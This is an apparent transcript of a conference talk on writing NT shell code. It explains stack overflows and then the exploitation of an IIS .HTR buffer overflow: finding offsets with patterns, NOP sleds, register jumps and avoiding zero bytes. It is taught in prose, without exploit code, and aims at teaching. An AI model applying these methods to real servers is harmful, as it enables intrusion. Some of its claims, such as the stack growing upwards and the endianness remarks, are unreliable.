OK, thank you for joining us today. We are going to talk about how to write NT shell code. We will start by explaining what shell code is in general. We will show you the C code we started with and how you convert it to assembly language code that directly makes the system calls. And then we will show what kind of things you have to do to your code so you can use it as shell code. Can someone please remove that dog? It doesn't have to be permanent, so just someone go there. We are not going to show very sophisticated shell code, just some simple code that writes to a file. The background is that shell code normally doesn't have to be destructive. On UNIX it is very simple to make a small piece of code that will actually open a shell for you, and then you have complete access to the machine over the network connection. But on NT things are a little more difficult. You have to have a special DLL, the Winsock DLL, to make socket calls at all. Piping is not so straightforward. Making system calls under NT is not so straightforward. The general methods apply, though, so what we show today can be used to make more elaborate shell code, and that has been done. But shell code that actually opens TCP connections or pipes to programs is quite long. So if you want that, you can find working code on the net. We will just show you what kind of transformations you have to do to get working shell code. The example we will be using is the eEye exploit that was on the net, I think a month ago, against the Internet Information Server on NT, where you could request .HTR files and overrun a buffer with the name of the file. So that was the actual buffer overflow we exploited. And it was sufficient to show that you could run code; we didn't have to open a shell. So the goal was not to actually get a shell on the machine, but just to show the client that you could run code on the machine. And we will be trying to use that beamer to show the slides.
By the way, I'm Felix, and this is Earthquir. And he will be using the slides to talk to you now. OK. I'll give some introduction into, well, the question is, what is a buffer overflow and what is an exploit of it? For this, we make a short, small example under Linux, not NT, because most of the things apply to almost all operating systems. The concept is the same. So I show you something. We have this little piece of code, when I find it. Actually, we will be using Intel syntax for assembly language in our examples. You can use it under Linux with NASM, but you don't have to. We use this because when I wrote the code, I used my knowledge from MS-DOS days, as you can probably see from the code. Actually, this is the kind of function that can be exploited with buffer overflows. I hope you can read it. It's a small piece of C code. Better? Is it better? OK, we have a small piece of C code. There's nothing more than one buffer. It's called s, this line. And you can see we are copying the value of the environment variable foo into this static buffer. And the question is, what happens? What is going on there? We might expect that when the value of foo is small, something like 1 character or 1,000 characters, nothing will happen that we wouldn't expect. It will be copied into this buffer s. Now, I am prepared, I compiled it already. So when I already set up the variable foo, oh, I didn't. Let's try now. Nothing happens. Maybe you see what happened. Now we have this, which is quite long. I wrote 103 times the string 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 into this variable foo. So it's bigger than the buffer s. And so we have, maybe some of us see such a line many times a day. OK, so we start to understand what is actually going on. What is the segmentation fault here? For this, I have prepared an assembler output of the compiler, not the compilation in binary form, but I use GCC. Oops, what's that? Anyway, we have here a prepared version of it.
So this is assembly. And the important part is here. This is the main function, the function where the program actually starts to be executed. And those three lines are standard code that the compiler writes in almost every program. It's called, how do you say, setting up a stack frame. So actually what happens is that on the stack, you see the first line, we put the base pointer onto the stack to mark where our code will begin. In the third line, which is the most important line, there is an allocation of space on the stack for our variable s, the buffer. So now we have an idea of what the stack looks like. Well, some of the words maybe are not so familiar to some of you. You need, well, I will not explain what the stack actually is. Do you want to explain? OK. We don't want to scare you away, but this is going to be mostly assembly language, the examples we will be showing you. So if you haven't seen this before, this is full of legacy. The whole Intel architecture is full of legacy anyway. So, oh, I'm not the first in this room. The stack is quite an old concept in computers. What happens is that the memory physically is just a large block that can be addressed at any point. And if you load the program into memory, the code is loaded at some location that is dynamic on some systems and static on others. Anyway, this is static code from the program file. Then you have some data that can be dynamically allocated by the program itself. And you have another type of memory that can be allocated dynamically by the program. The idea is that you don't write the whole program in one piece, but you write procedures. So you separate the different ideas in the program into procedures. And when you call a procedure, the procedure has to know where to jump back. It has to know who called it, so that when it's done, execution can continue at the point from where you called it.
So we have to record the location from which we were called at some point. And we do this on the stack. This organization, you can see it on the picture. This is where the return address is. The whole rectangle there is the stack for the current program. And on the bottom you see the pointer to the environment variables, the pointer to the arguments, the integer which says how many arguments we have, and then the return address. This is on the stack. Then what you saw in the piece of assembly code starts there. We push the data which was in the base pointer before. This is above the return address. And then we allocate space for the buffer s we had in the C code. Maybe I should show you the name. So we need a location to remember from where we were called. And this location is not known inside the procedure. So if we call some piece of other code, which might actually be part of the system library or the operating system itself, what we do is first we push the address where we want the procedure to continue when it's done on the stack. Then we call the procedure. And the procedure, when it's done, gets this value from the stack and returns there, jumps there. So what happens if this procedure calls another procedure? That has to be put on the stack again, so the address is not static. Pushing something on the stack means writing it here, for example, and then incrementing the stack pointer to the next address. So the only operations that can be done on the stack are pushing values on it and then removing the values again. When a procedure needs more memory than what you passed it, dynamic memory that will no longer be needed when the procedure is done, you can put that on the stack too, as happened to the buffer used in this example. So you don't have to put the data on the stack in just bytes or words, but you can also allocate larger amounts of stack like this buffer. The stack grows upwards.
That means if you put data on the stack, behind that data is the address where the procedure wants to continue execution when it's done. So when you use a local variable like the buffer s in the example, and you write something there that's longer than the space that was allocated for it, you overwrite this value, the return address. OK, we show what he explained in this example. So you saw maybe. Actually, it is not always the case that the stack grows upwards. There are some historical examples of architectures where the stack grows downwards. And all recent architectures do grow this way. So this is not only Intel machines, but also most other machines, but you don't have to do it like this. And of course, if the stack grows in the other direction, it's much more difficult to overwrite the return address. OK, let's take a look at it. The code makes just a simple copy of the environment variable foo into the buffer s. That means in this stack case, the copying will start at minus 1,024, looking from the base pointer. The value of foo will be copied starting there and moving down there. And if it's too large, it will overwrite the base pointer and the return address. And this is something we are going to look at through some glasses. It's called the debugger. Actually, one important thing to notice at this point is that after you overwrite this return address, it's gone. This is the reason why exploiting a buffer overflow most of the time means that the program you're exploiting ends then, because you don't know where to continue. And this means that in the IIS case we will be showing later, the process will either crash by itself or we will end it the natural way, which leaves fewer traces. So this is what's happening most of the time in exploits. Let's take a look. I put a breakpoint in the main function, so we can see what addresses are actually used. As you can see, the stack frame here doesn't have any absolute addresses there.
You can't see them. We just know relative structure of the stack. We don't know the actual location in memory. So now we see some address there. The main function starts at the address 08048539. So we are at the main function now. And we take a look at the disassembly. We don't expect any difference to what we had before in the assembly. It's just now we will have the addresses too. You see here, maybe you remember those three lines. Those are the lines for the stack frame. And this is the buffer size we used for our variable. So we saw already what happens when we used our variable foo, which was 1,030 bytes long. And we just want to know what happens at this point, return, as Felix said. When we overwrite the return address here, which was set from the calling function of our function, we are maybe ending somewhere. Who knows? Let's take a look. Actually, this is the point where the program crashes most of the time because the addressable memory is much larger than the actual memory in most machines. So even if you have much memory, the program will usually be allocated just a few kilobytes, maybe megabytes. But if you jump to a random address somewhere, it will probably not be map memory. And the operating system will notice. OK, I set a breakpoint at the return where the return happens. And now we continue to there. And we want to see what the next step is. As you can see, there is some, well, maybe you can't read it, but the debugger tries to tell me that there's something strange. There's an address pointing to the unknown function for the debugger. And if I just continue, what happens is that the return address will be used, the code at that position, whatever was available on the return address, on the stack, whatever there was, this will be called. And maybe you can see those four bytes. Those are digits. Those are the ASCII version of 9 and 8, which is a part of our variable foo. So we overwrote the return address with the part of our variable. 
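The overwrite seen in the debugger can be replayed on paper. The following is a minimal sketch, not the program from the slides: it assumes the frame is laid out as the 1,024-byte buffer, then the saved base pointer, then the return address, with no padding in between, and it uses made-up original values for the two saved words.

```python
import struct

BUF_SIZE = 1024                # size of the local buffer s, as in the talk
ORIGINAL_EBP = 0xBFFFF7A8      # hypothetical saved base pointer, for illustration only
ORIGINAL_RETURN = 0x0804856F   # hypothetical return address, for illustration only


def simulate_strcpy_into_frame(data):
    """Copy data plus a terminating NUL into a simulated stack frame.

    Assumed layout, lowest address first: buffer, saved EBP, return address.
    Returns (saved_ebp, return_address) as they read back after the copy.
    """
    frame = bytearray(BUF_SIZE)
    frame += struct.pack("<I", ORIGINAL_EBP)
    frame += struct.pack("<I", ORIGINAL_RETURN)
    frame += bytes(64)  # part of the caller's frame, so the model has room to spill into
    copied = data + b"\x00"  # strcpy also writes the end-of-string marker
    if len(copied) > len(frame):
        raise ValueError("input is longer than this small model covers")
    frame[:len(copied)] = copied  # no length check against BUF_SIZE, just like strcpy
    return struct.unpack_from("<II", frame, BUF_SIZE)


foo = b"0123456789" * 103  # the 1,030-byte value used in the demonstration
ebp, ret = simulate_strcpy_into_frame(foo)
print(hex(ebp))  # 0x37363534, the characters "4567"
print(hex(ret))  # 0x8003938, the characters "8" and "9", a NUL, and one untouched byte
```

Under these assumptions the return address ends up holding the ASCII codes of 8 and 9 followed by a zero byte, which is the kind of value the debugger reports above. A short value of foo leaves both saved words untouched.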
So the question, the natural question now is, can we put something into the variable foo at a special position, so that we don't have this garbage here? Because there's no function at that position. That's why we have a segmentation fault here. But we can choose the function freely, something like, I don't know, maybe write. And this is how an exploit works, actually. You create a special string, for example in the variable foo, where at the special position you put an address where you definitely know there is a function available that you want to use. So instead of returning, we will jump from here directly to the function of your choice. One thing you should have noticed is that we overwrote the lower part of the number. This is actually surprising, because one would think that machines store numbers as you write them on paper, storing the highest digits first in memory. But this is not the case on Intel machines. Most modern CPUs actually can switch this, so the operating system can tell the CPU which mode to use. Actually, big endian is much of the norm on different Unix systems, but on Intel CPUs you cannot switch this. So MS-DOS and Windows can only use the little endian mode, which is the default on Intel. Most other architectures and operating systems use big endian: PowerPC, MIPS, most of the other things use this. Actually, Alpha is a case where it depends on the operating system which mode is used. Linux on Alpha is quite an old port of Linux, so they decided to emulate the Intel ways and use little endian. Now Linux has moved farther than that and can actually run both ways, but it's still using little endian. So the only CPUs you will probably ever meet that use little endian mode in memory are those two. And that means if we overwrite the first byte in memory of the address, we actually overwrite, in the written form, the last bytes.
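The byte order described here can be checked with a few lines. This is a small illustration using Python's standard struct module and the address of main shown by the debugger in the talk, 08048539; the helper name address_bytes is made up for the example.

```python
import struct


def address_bytes(address, little_endian=True):
    """Return the four bytes of a 32-bit address in the order they sit in memory."""
    return struct.pack("<I" if little_endian else ">I", address)


main_address = 0x08048539  # address of main as shown by the debugger in the talk

print(address_bytes(main_address).hex())                       # 39850408 (Intel order)
print(address_bytes(main_address, little_endian=False).hex())  # 08048539 (as written on paper)

# Overwriting only the first byte in memory changes the last two written digits.
in_memory = bytearray(address_bytes(main_address))
in_memory[0] = 0x41  # the letter A
patched = struct.unpack("<I", bytes(in_memory))[0]
print(hex(patched))  # 0x8048541
```

An address placed in an overflow string for an Intel target therefore has to be written with its lowest byte first.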
And you might have noticed the two 0s here at this point, which is the marker for the end of a string in C. So what we actually exploit here is not a lazy programmer, but a function of the standard C library that is defined in a way that makes it hard to prevent such exploits, because you can't tell this function how much space you have reserved. So unless you check manually beforehand, there will always be a way to write more data than you have allocated. OK. We won't go much farther with this example. We don't want to write the shell code exploit for Linux, not for this program. But I guess you have the idea of what is going on there, what the buffer overflow actually is, and how to exploit it. We now switch to the more important stuff, the NT exploit. It doesn't matter. There are a few typos here, and it's not just 10 minutes old, so. What you will need is a computer and software which is known to be broken, to have a buffer overflow. You need both parts to test something. And you need some tools. Oh, I forgot the compiler. Maybe you need the compiler too. You need a debugger, as in our case, because you have to check out the stack and the registers of the CPU. That is the essential information for you. And you need a macro assembler. Sorry. OK, some other aspects are that you need the header files of your operating system. In our case, it's the NT API, for example for how to write a file on disk, something like that. You need the information about what parameters are expected by this function. Well, and the last point is you need some skills. This is some knowledge of assembly programming. And, well, basic knowledge of how the CPU works, how your architecture works. How many registers are there? What are they used for? This is basic knowledge. You can learn it by yourself. I guess it depends on you. Maybe between five minutes and 20 days, something there. The average is three.
We actually suggest that you use Linux for testing buffer overflows, because on NT many system calls are not checking the parameters properly, so you might actually crash the whole system by accident. So you should use Linux. And the software we list here, actually, this is a typo, SoftICE is written like the ice cream. Some individual uploaded it to our FTP server in case you needed this commercial software. So if you really use it, you should, of course, buy it. Under Windows NT you can also use, for example, the Microsoft C++ debugger, which comes with Microsoft C++. This should be sufficient for most cases. It's not as comfortable as SoftICE, but sufficient. So how should we go about getting code to put in this buffer? If we write a small program like Hello World and compile it with the Microsoft C++ compiler, we get a binary that's much larger than the buffer we are trying to overflow. So we need to get small code. Programs that you compile with standard compilers normally use the standard library of that compiler, which is normally a few hundred kilobytes large, and which is probably also linked into the program that you are exploiting. But you can't be sure of that if someone is using some obscure language, or if a different version of the C library is used on the machine that you are trying to exploit. And so we need to get code that is both small and not using any libraries that may not be on the system or may be in a different language, different version, whatever. OK. The example now is about the IIS bug, which was found by, I don't know how they are called. eEye. OK, eEye. A month ago, which was almost like this, I explain it on the board. If you used your favorite browser, well, actually, your browser cannot handle those addresses. But what happened was, if you connected to IIS and sent a URL which is quite long and has the .HTR ending, IIS would immediately fall over. Well, there are some conditions.
It must be version four under an English system. We couldn't make it work on German systems. That doesn't mean the exploit doesn't work on German systems. But the system libraries are in a different language. That means some error messages may be longer, taking more or less space. That means the code that comes behind those messages moves a little. And as we will show on NT, it's quite difficult to do system calls because what you do is actually jump in the kernel. And you get the offset because the system component that loads program patches those offsets for you. So under more sane systems like Linux, you do a system interrupt. That means you have a global table of system routines, addresses, so the program can actually have position independent code. The code works wherever the code is mapped, which is actually what you want because loading a program does not need the overhead then to patch up those offsets. So under NT, what you do is you write an offset in your file. You just do a jump or call into operating system space. And the linker then does not really fix up those offsets, but leaves a list of offsets that still have to be patched when the program is loaded at load time. And the operating system then puts these offsets there, which of course leaves the problem that our exploit code needs those offsets too if you want to make system calls. And a system call is something like open a file, write data into a file, run an external program, stuff like that. So everything that actually does something needs to run system calls. That's why we would tell you it's easier to learn how to make buffer overflows work under Linux because you don't have that kind of crap on your hands then. OK, maybe this was a bit too fast. We make it step by step. The first thing you need is some kind of orientation. What do you have? So what you try is you create a buffer overflow with the program, and maybe use a nice pattern to recognize. 
As you remember, we use the debugger to watch what the code actually does with the data we send. So he closed the program. We do it on the screen. Not really. Anyway, this sucks. We need to put it. So the problem is that at this point we don't actually know if there are any variables besides that buffer on the stack. And whether the calling convention actually does this; most compilers have an optimization you can enable that leaves the stack pointer out, so it doesn't save this register on the stack. So what we don't really know is how much more data after the buffer we have to overwrite to get to this address. And because we don't know at which address the stack is and on which part of the stack we are, we don't know the offset that we have to write here to get to our code. To get our code onto the system, there's only one position where the code can actually be. This is inside this buffer. So the idea of the exploit would be to write into this position an address in this part, where the code that we uploaded begins. And then the procedure would return, would get the wrong value, and execute the code we wrote there. Just to make another picture of what Felix said, if this is the position where the stack pointer is. Well, this is a special case for the other example. We had the knowledge about the program because we wrote it. We already know how big the buffer will be. But in general, for example in the IIS exploit, we don't have such information. So we need the information. For example, you know here this is 1,024 bytes. But in general, how far away are we from the stack pointer? How much code do we have to put in to overwrite the stack pointer? So we need a technique to find out, let us say our code will start here and move down, we need this distance. And how do we get this information? There's a quite easy technique to get the information.
You write a special pattern as your overflow code. You remember the 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 in the previous example. And you could see which digits were left at the return address on the stack. But this is not enough information, because the blocks 0, 1, 2, and so on are repeating. So we don't know which block it is. The idea is to take a, I just show one pattern. How many of you are reading the Bugtraq mailing list? OK, most of you. So if you have seen buffer overflows in the last month or so, people are not actually posting exploit code, but they put lots of A's in the buffer. And the reason for this is that when the program crashes and you have a debugger loaded on your system, or you get the core dump and can examine it under Linux or Unix with your favorite debugger, you get a register dump. So you see what data was in the registers when the program crashed. And this is important, because the fact that the program crashes does not mean that you actually overwrote a buffer. It could be some other bug. Or it could be that you overwrote not some values on the stack, but on the heap, and the program crashed because of some other problem. So this is done because if you see in the register dump that one register has lots of A's in it, which is 41414141 in hex, then you know that this register was loaded from the memory you overwrote. So that's why you use lots of A's. You could use lots of other patterns too, but this has become the standard now. So if you find a buffer overflow, do it with A's too. Yeah, the A's are important to give you the information that you are on the right way. You can make an overflow there, most probably. The other thing is, I have a small program which generates nice patterns. Just give it a number. Maybe we take some more. Then you will see the patterns better, for those who are interested. Well, maybe you see some structure there. That's the way the patterns are generated. You start with the small z. That's the code.
Well, the only important information is that with this pattern, if you try to make an overflow with it, you will immediately have the information where in your pattern the overwriting occurred. There is one more piece of information you need. I told you that you can put more than one word on the stack. There's one more thing. Most CPUs are more efficient if you align your data. And most RISC CPUs only allow access to aligned data. That means you can only access data that is on a dword boundary, where the offset is divisible by four, or by the word length. And that means that if we pop a value on the stack, we always, if we push a value on the stack, we always push at least four bytes on Intel, and on Alpha, of course, eight bytes. So what we need here is a pattern that allows us to see which offset we need, which part of the overwritten memory actually is the return address. So the idea is to just put different words on the stack. We overwrite this with a regular pattern, so that if we examine the core dump or the debugger's register dump, we can see which value was returned to. And then you can simply calculate where it was in your generated pattern. So this is just an example which is easy to see, because then we immediately know it must be this one. Yes, and now we have the distance from the beginning to the end, well, in that case, from the opposite. So we have the information where in memory we are, the offset. And then we know how much code we actually can create. That's the other information. Actually, this pattern has another nice property that you want, because it's a web browser. Not all characters are legal. You can't, for example, put 0 bytes in a URL. So this pattern consists only of normal characters. That means most buffer overflows will not alter that pattern. When creating code, we will see why this is important. But in this case, you need a pattern that, for example, does not contain zeros. Well, this is a bit nonsense there.
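The pattern generator shown in the talk is not reproduced in this transcript, so the following is a stand-in sketch of the same idea rather than the speakers' program. The word scheme (one uppercase letter, one lowercase letter, two digits) and the function names are assumptions made for this example. Every aligned four-byte word is different, and only letters and digits are used, so the pattern contains no zero bytes and no dots.

```python
import string
import struct

MAX_PATTERN_LENGTH = 26 * 26 * 100 * 4  # number of distinct words times four bytes


def make_pattern(length):
    """Build a pattern of distinct four-byte words: Aa00, Aa01, ..., Aa99, Ab00, ..."""
    if length > MAX_PATTERN_LENGTH:
        raise ValueError("requested pattern is longer than this scheme can provide")
    words = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for number in range(100):
                words.append("%s%s%02d" % (upper, lower, number))
                if len(words) * 4 >= length:
                    return "".join(words)[:length].encode("ascii")
    return b""


def find_offset(pattern, register_value):
    """Locate the four bytes found in a register dump inside the pattern.

    register_value is the 32-bit number shown by the debugger; on Intel it was
    loaded from memory in little endian order. Returns -1 if it is not found.
    """
    return pattern.find(struct.pack("<I", register_value))


pattern = make_pattern(1100)
# Pretend the crash dump showed the word that sits 1,028 bytes into the pattern.
crashed_at = struct.unpack_from("<I", pattern, 1028)[0]
print(find_offset(pattern, crashed_at))  # 1028
```

The returned offset is the number of filler bytes needed before the four bytes that replace the return address.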
The important stuff was said by Felix. You tried, you found the overflow. You take a nice pattern and you see where you are in memory. So the next step is to make more out of this information. And as he said, there may be some other constraints. In IIS, for example, you are not allowed to send dots. Because in the URL, you remember, if you would use a dot, well, here, those are 1,024 characters. And if you had a dot in between, then IIS would recognize the rest of it as the ending and would not overflow anymore, because it needs the .HTR there. So that means you have some constraints. Your code must fulfill some requirements. Because it's easier to see how to get something done in Linux, we will use that example. There's not only code that is loaded from disk, but there is also some other static data. For example, the command line arguments are somewhere in the memory range too, because you can read them, and the environment variables. So something you can quite easily guess is the position of the environment variables. Because when the program is loaded and you didn't change the environment, you have the same environment that the other program will see. So what you can do is put something in an environment variable and see its position relative to the start of the program. And then you can guess where this same environment variable will be for the other program. This will, of course, still depend on the environment and whatever, but to get something done, you have an address that you can guess, that is most likely static and the same in the other program. So as I told you, you have to patch that return address and you don't know where you are. But there's some other space where you could have put code. So one trick that is most often used when you are beginning to experiment with buffer overflows is that you actually put a value in the environment that contains code.
And then you calculate the address of this and overwrite the return address with that value. And then you have given the program code to execute. And with some tricks, you can then find out which part of the program you overflowed. And actually, there have been buffer overflows, not over the network, but local ones, on Solaris, for example. There's one example I can recall now where this would actually suffice, because you overwrote some code that used the environment and you could kill two birds with one stone. So this is one way to get the code there. But on the other hand, if we can put any value here, we don't need arbitrary code at the other side. It's sufficient to have code that will jump back to where it came from. And the fun part is that when the buffer is overwritten, you normally use registers of the CPU to point to the addresses that you're copying. So one of the registers, on Intel it's mostly the EDI register, contains a pointer that is in the vicinity of the code that you just overwrote. So you don't need arbitrary code that you can jump to, but code that will use this register and jump there. This doesn't mean that you have to put that code somewhere, but you have to find some place in some system library where there is some code that actually does this, that uses this register and jumps there. And this is just the way that was used on NT. We'll come to that later. Oh, there are other tricks, by the way. You don't have to know exactly where you want to go to. To give you an idea of how big a shell code is in the end: the one that we have been writing here was something like 130 bytes. So you have lots of spare space. What you can also do is just guess where the code will be. And you have all the time of your life to test it if it's a local program. So you can just run the program and guess some address. And then you just increment the address you are trying by the size of the buffer. And eventually, it will return to some place in the buffer.
And you can, of course, write code that does nothing. So what you actually do is fill the buffer with lots of code that does nothing. And at the end, there's your shell code. Then you don't have to try all the possible values, you just have to come near. So it speeds things up greatly. So we now assume that we have a way to jump into the shell code. But that's not all. We can't place arbitrary code there. Depending on the program we are exploiting, we have additional constraints. The most common constraint is no 0 bytes, because the most commonly exploited functions are string functions from the C language. And then you just have to write code that doesn't contain zeros. This is a layer below what most programmers ever see. The closest most people usually come to the machine is seeing the assembler dump. But there you don't know if the code you wrote contains zeros or not. And this is even more of a problem if you use relative addressing. In our example, we are going to write to a file. So we have to have the file name in memory. And it's just part of the shell code. So one second. So what we do is we try to calculate our position. We try to find out our position. We will show you the trick used to do that in a few minutes. And then you have to do relative addressing. So you have to add the offset from the start of your code to the message that contains the file name. This is a simple calculation, but on most machines you can't add just one-byte values, you can only add longer values. And longer values means that it's padded with zeros in the beginning. And you can't use zeros. So you need lots of tricks. And that is the part that makes shell code writing a little tricky. It's not actually difficult. We hope you will get that impression later. Did you have a question? Or we'll just join your name. Your question. Okay. What we have now, just to recollect everything: we have some information about the memory layout.
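The layout described here, do-nothing code first and the shell code at the end of the buffer, can be sketched as a small helper. Everything specific in it is an assumption for illustration: the frame layout (buffer, four bytes for the saved base pointer, then the return address), the guessed address, and the placeholder standing in for real shell code. The only instruction encoding relied on is 0x90, the one-byte x86 NOP. The helper also enforces the no-zero-bytes constraint.

```python
import struct

NOP = b"\x90"  # x86 one-byte instruction that does nothing


def build_payload(shellcode, buffer_size, guessed_address, forbidden=b"\x00"):
    """Lay out NOPs, then the shell code, then filler and a guessed return address.

    Assumed frame layout: buffer, 4 bytes saved base pointer, 4 bytes return address.
    Raises ValueError if any byte of the result is in the forbidden set.
    """
    if len(shellcode) > buffer_size:
        raise ValueError("shell code does not fit into the buffer")
    sled = NOP * (buffer_size - len(shellcode))
    payload = sled + shellcode + b"AAAA" + struct.pack("<I", guessed_address)
    bad = sorted(set(payload) & set(forbidden))
    if bad:
        raise ValueError("payload contains forbidden byte values: %r" % bad)
    return payload


placeholder = b"\xcc" * 130  # stand-in for roughly 130 bytes of shell code
payload = build_payload(placeholder, 1024, 0xBFFFF6C0)  # hypothetical guessed address
print(len(payload))  # 1032
```

Any guessed address that lands somewhere in the first 894 bytes slides through the NOPs into the code, which is why coming near is enough. For a target like the URL case above, the forbidden set would also include the dot.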
We know something about where we will be in memory with our code. And now we start to think about what kind of code we want. One question. Because you put the code there, you know it's the code you uploaded. You overwrite a large buffer. And you know that this distance is the same, because you upload all the bytes in between too. So if you upload 10 bytes, you know that the distance between the first and the last one is 10. So if you upload two kilobytes, you know that the distance in between is constant, no matter where your code actually starts. Yeah. Maybe the question was whether the whole picture there may change in memory every time you run. You know, you run the program and the starting point for the return address is somewhere, and the next time it's somewhere different. But within your program, all the buffers you use are always in the same relative position. The memory layout for your program is the same if you use static buffers. Actually, most compilers nowadays allow you to create position independent code, because if you have a shared library, most of you have probably seen this, you want to load the code into memory and don't want to fiddle with it. If you don't have position independent code, you have to go through the code, find all the pointers to some other place in the same code, and add the starting address of where you loaded the library in memory. So this is obviously not something you want to do, and most CPUs allow you to do position independent code, but it's not something that you can normally learn from reading assembly language books. So the idea is to write code that works no matter where it is loaded, and the first step is to find out where the starting point is. Highly secure password security here. Okay, I have to move the mouse a bit. Okay, so maybe just to complete this one.
It may be that the space you have found available for your shell code is only 20 bytes. Then you won't start writing an exploit that starts, for example, an email session or something like that, because you don't have enough memory for it. So the choice of code depends, for example, on the amount of space that is available. It also depends on your knowledge of the system. For example, do you want to write a file? Do you know how to write a file on that system? This information can be obtained. For example, you simply write a program on that system, just a user program that writes a file, you debug it, and you get the addresses of the functions that are called. Yeah, you just write the piece. You create all the structures and parameters you need for the function, and you simply call the function in your favorite C compiler. For example, under NT you use the Microsoft C++ compiler environment, write three lines of code that write some file somewhere, and then start debugging it. You will immediately see what happens in this program and which functions are called, and then you have the offsets available. So to get the shell code, we write some code in C first to see what the compiler makes of it. As I told you, we want to open a file and write something to it, to demonstrate to the man who owns the machine that you can write to his machine, that you can run code on his machine. The obvious thing for a C programmer to do would be to call fopen. If you compile this code and use a debugger to see what fopen actually does, you will see that it's just a wrapper for the open function, and open is in turn a wrapper for a system call. That's the reason why programs nowadays are so slow: you can't do anything directly. All you do is call wrappers that call wrappers and so on.
So we cannot call fopen because it is part of the system library and we don't want to depend on that, and we don't want to call open for the same reason. So we can use a debugger and see what open actually does, and what we will see is something like, sorry. So this would be the assembler code that actually does the system call. What it does first is push some register on the stack. Normally operating systems use the registers to receive their arguments, and then you call the system. This interrupt is one of the ways to call the system, and it's one of the good ways because you don't have to know where the code that does the work actually resides. This instruction is completely independent of where the code is that does the system call. Linux does it this way. So what you need to get the effect you initially wanted is two assembler instructions, which is something like five bytes. The open wrapper is something like 50 bytes. The fopen wrapper has to initialize the FILE structure, and it's something like 500 bytes. And the code that directly does what you wanted in the first place is about five bytes. That is why programs written by people directly in assembly language are normally very small and fast: this is overhead you don't actually need. It's more comfortable for the programmer to use these wrappers because you don't have to remember how your system implements the system call, but for shell code you want to do it this way. So you use the debugger to step into the functions you need, and you will see that this interrupt is used every time for system calls. So how is the system supposed to know that you want to open a file? The idea is to put into some register a code, defined in some header file, that tells the system what you actually want.
So you put into this register what you want the system to do, and of course you have to tell the system the arguments too, like the name of the file you want to create. This is a string, and it doesn't fit in one register. Registers hold only integers, so you can put numbers in there, or pointers to memory locations, but not strings. So what you do is put in the offset, that is, the address of the string. This would be an example string. It's somewhere in memory, and when you write the program you know the offset of this first character, the address. You put this address in the register. The string is ended with a zero byte to show the system that the string ends there. As a C programmer you normally don't see this, but you know it if you do some string manipulation. The Linux kernel is written in C too, as are most Unix and FreeBSD variants, so this is a convention that's normally used on other systems as well; even NT uses zero-terminated strings. So you put this address in a register and make the system call, and the system has to tell you whether the call succeeded or not. What happens is that afterwards the register EAX contains the result or an error code. This is quite low level, and normally you don't want to do this because in the end it will only work on Linux. It's not portable. That's why we normally don't use code like this: it's small, it's fast, it does what we want, but it's tedious to write and it's not portable. But with a debugger you can get the magic incantations you need to tell the system to open a file. And you will see that, for example, this offset can contain zero bytes too. So if you construct code that opens a file, writes something to it, closes the file, and then exits the program, you will have lots of zeros in your code. And you get some other problems. This is how system calls work on NT: you call the system code directly.
Most people normally use the latest version of NT, so this offset is fixed because they all have the same operating system installed. Of course, the next service pack might change this address. That's why exploits sometimes work on one machine but not on another one that looks the same. If you install MS Office, you know that it will overwrite half of your system, and these are some of the effects that might not be beneficial in this case. So we have lots of problems that are not obvious at first. For example, calls like this one are always relative calls on the Intel architecture. This will be encoded in a few bytes in memory. The first one is the call opcode, which tells the CPU that you want to call something. But if you do two calls to the same address, you get two different byte strings, because you don't encode the address; you encode the difference between where you are right now and that address. This is tricky because if you insert some code above, this difference might change so that it includes a zero that wasn't there before. That's the kind of trouble you have when you construct shell code, and you don't have it on Linux. That's why we say you should use this method and try your stuff on Linux first, and then you can port it to NT later. Okay, just the bottom line of the information we have now. The point is what we want to do in our code. Yeah. We want to execute something; for this we need parameters and we need the function. And as we learned, different systems handle functions in different ways: Linux, for example, uses the interrupt method and NT uses the call method. But whatever method is used, you can check it out with a debugger. Just write a simple piece of C code, follow each step in the debugger, and you will see what actually happens. In the NT case, for example, you will see the calls.
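The point about relative calls can be made concrete with a short Python sketch. It assumes the ordinary 32-bit near call (opcode `E8` followed by a four-byte little-endian displacement measured from the end of the five-byte instruction). All addresses are invented for illustration, and `encode_call_rel32` is a hypothetical helper name.

```python
import struct

def encode_call_rel32(call_addr, target):
    """Encode a near call (E8 rel32) that sits at call_addr and reaches target."""
    # The displacement is relative to the instruction after the 5-byte call.
    rel = (target - (call_addr + 5)) & 0xFFFFFFFF
    return b"\xe8" + struct.pack("<I", rel)

TARGET = 0x77F01234  # made-up address of some system function

first = encode_call_rel32(0x00401000, TARGET)
second = encode_call_rel32(0x00401010, TARGET)   # same target, different call site
shifted = encode_call_rel32(0x0040102F, TARGET)  # same call after 0x2F bytes were inserted above

for label, code in (("first", first), ("second", second), ("shifted", shifted)):
    print(f"{label:8s} {code.hex()}  contains zero byte: {0 in code}")
```

The first two encodings differ although the target is the same, and in the third one moving the call site turns the low byte of the displacement into zero, which is exactly the kind of accident the talk warns about.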
It may be somewhat more complicated because the function you see may call another function, and that one calls yet another, but somewhere there is the essential function you want to use. Actually, I would recommend that you buy a book from the manufacturer of your CPU and read it end to end to get all the tiny details that make your life harder in the end if you don't know them. For example, what you use nowadays is 32-bit protected mode, but in DOS you used 16-bit code, and there is another version of call that can actually call a fixed address, not only relative ones. The programmer doesn't see all this; it is a detail of the CPU. You see it if you get a book about the Intel instruction set from your favorite bookstore, or you get the NASM assembler, which comes with a manual that contains information about the Intel instructions. But in the case of the IIS exploit we actually did it the other way around. We wrote a small piece of C code and followed it, because we didn't know where NT has a low-level function for writing a file. We had some C++ function in some library somewhere, but we wanted an actual low-level function because that is most probably available on every NT machine. So we followed the calls. The first thing we have to do is apologize, because this slide was done a few seconds before we started here; we considered it a good thing to show you the initial code. So this was translated back from the later code, and of course what we mean in this place is that we want to write HTML code. So this was actually not an underscore but another character. I forgot to translate that, but it's not so important. What you see here is the code that you get if you reverse engineer what your operating system's wrappers do in the end, with these goofy constants that we push on the stack here: zero, 128.
